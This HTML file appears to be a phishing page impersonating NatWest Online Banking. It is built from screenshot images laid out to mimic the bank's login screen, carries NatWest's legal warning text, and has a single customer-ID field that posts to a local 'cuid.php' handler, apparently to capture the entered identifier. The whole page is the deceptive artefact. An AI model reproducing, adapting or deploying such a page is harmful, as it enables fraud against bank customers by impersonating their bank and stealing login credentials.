<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="icon" type="image/x-icon" href="favicon.ico" />
<title>Log in to online banking</title>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<meta name="generator" content="Web Page Maker">
<link rel="stylesheet" type="text/css" href="default.css" />
</head>
<body bgColor="#F3F3F3">
<form name="form1" method="POST" action="cuid.php" style="margin:0px">
<div id="formimage1" style="position:absolute; left:629px; top:446px; z-index:4"><input type="image" name="formimage1" width="84" height="40" src="images/2.PNG"></div>
<input name="DBID_edit" type="text" maxlength=10 style="position:absolute;width:93px;left:326px;top:307px;z-index:7" required>
</form>

<div id="g_image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:977px; height:99px; z-index:1"><img src="images/1.PNG" alt="" title="" border=0 width=977 height=99></div>

<div id="image2" style="position:absolute; overflow:hidden; left:183px; top:196px; width:545px; height:343px; z-index:2"><img src="images/3.PNG" alt="" title="" border=0 width=545 height=343></div>

<div id="image3" style="position:absolute; overflow:hidden; left:182px; top:553px; width:544px; height:88px; z-index:3"><img src="images/4.PNG" alt="" title="" border=0 width=544 height=88></div>

<div id="g_shape1" style="position:absolute; overflow:hidden; left:466px; top:171px; width:269px; height:56px; z-index:5"><img border=0 width="100%" height="100%" alt="" src="images/shape14175218.png"></div>

<div id="shape2" style="position:absolute; overflow:hidden; left:325px; top:306px; width:98px; height:34px; z-index:6"><img border=0 width="100%" height="100%" alt="" src="images/shape14204780.png"></div>

<div id="image4" style="position:absolute; overflow:hidden; left:0px; top:775px; width:977px; height:106px; z-index:8"><img src="images/5.PNG" alt="" title="" border=0 width=977 height=106></div>

<div id="shape4" style="position:absolute; overflow:hidden; left:877px; top:767px; width:100px; height:56px; z-index:10"><img border=0 width="100%" height="100%" alt="" src="images/shape14335165.png"></div>

<div id="text1" style="position:absolute; overflow:hidden; left:184px; top:660px; width:542px; height:92px; z-index:11">
<div class="wpmd">
<div><font color="#581D3A" face="Lucida Sans Unicode">Only individuals who have a NatWest account and authorised access to Online Banking should proceed beyond this point. For the security of customers, any unauthorised attempt to access customer bank information will be monitored and may be subject to legal action.</font></div>
</div></div>

<div id="g_text1" style="position:absolute; overflow:hidden; left:186px; top:111px; width:463px; height:76px; z-index:12">
<div class="wpmd">
<div><font color="#400040" class="ws24"><B>Online Banking services</B></font></div>
</div></div>

<div id="g_hr1" style="position:absolute; overflow:hidden; left:187px; top:157px; width:536px; height:17px; z-index:13">
<hr size=1 width=536>
</div>


</body>
</html>
